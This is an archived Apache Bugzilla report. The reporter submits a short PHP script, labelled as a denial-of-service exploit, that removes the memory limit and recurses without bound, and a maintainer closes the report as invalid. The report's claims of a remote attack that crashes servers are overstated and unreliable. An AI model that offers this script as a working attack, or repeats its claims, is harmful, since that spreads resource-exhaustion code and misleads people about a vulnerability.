You are viewing a plain text version of this content. The canonical link for it is here.
Posted to bugs@httpd.apache.org by bu...@apache.org on 2019/12/14 14:43:31 UTC
[Bug 64002] New: Apache2 HTTP PHP Denial Of Service
https://bz.apache.org/bugzilla/show_bug.cgi?id=64002
Bug ID: 64002
Summary: Apache2 HTTP PHP Denial Of Service
Product: Apache httpd-2
Version: 2.5-HEAD
Hardware: All
OS: All
Status: NEW
Severity: normal
Priority: P2
Component: All
Assignee: bugs@httpd.apache.org
Reporter: alicangonullu@yahoo.com
Target Milestone: ---
> [Suggested description]
> # Exploit Name : Apache2 HTTP DoS
> # Exploit Date : 13-12-2019
> # Exploit Author : Ali Can Gonullu
>
> # Exploit :
>
> <?php
> $sayi = 10;
> ini_set("memory_limit","-1"); //Unlimited Memory
> function islem($n) {
> if ($n === 0) {
> return 1;
> } else {
> $hesap += $n*islem($n-1)-$n*islem($n-2)+$n*islem($n-3);
> echo $hesap;
> }
> }
> islem($sayi);
> ?>
>
> ------------------------------------------
>
> [Additional Information]
> This vulnerability inflates RAM to give the computer a blue screen.
> With this vulnerability, servers can be shutdown.
> The ini_set function is turned on in the original Apache PHP version.
> Apache Solution: Blocking ini_set
>
> ------------------------------------------
>
> [VulnerabilityType Other]
> Apache2 HTTP PHP Denial Of Service
>
> ------------------------------------------
>
> [Vendor of Product]
> Apache
>
> ------------------------------------------
>
> [Affected Product Code Base]
> Apache2 HTTP - All
>
> ------------------------------------------
>
> [Affected Component]
> Affected source code
>
> ------------------------------------------
>
> [Attack Type]
> Remote
>
> ------------------------------------------
>
> [Impact Denial of Service]
> true
>
> ------------------------------------------
>
> [Attack Vectors]
> Open PHP file (in this code)
>
> ------------------------------------------
>
> [Discoverer]
> Ali Can Gonullu
--
You are receiving this mail because:
You are the assignee for the bug.
---------------------------------------------------------------------
To unsubscribe, e-mail: bugs-unsubscribe@httpd.apache.org
For additional commands, e-mail: bugs-help@httpd.apache.org
[Bug 64002] Apache2 HTTP PHP Denial Of Service
Posted by bu...@apache.org.
https://bz.apache.org/bugzilla/show_bug.cgi?id=64002
Eric Covener <co...@gmail.com> changed:
What |Removed |Added
----------------------------------------------------------------------------
Resolution|--- |INVALID
Status|NEW |RESOLVED
--- Comment #1 from Eric Covener <co...@gmail.com> ---
php/mod_php aren't maintained here.
--
You are receiving this mail because:
You are the assignee for the bug.
---------------------------------------------------------------------
To unsubscribe, e-mail: bugs-unsubscribe@httpd.apache.org
For additional commands, e-mail: bugs-help@httpd.apache.org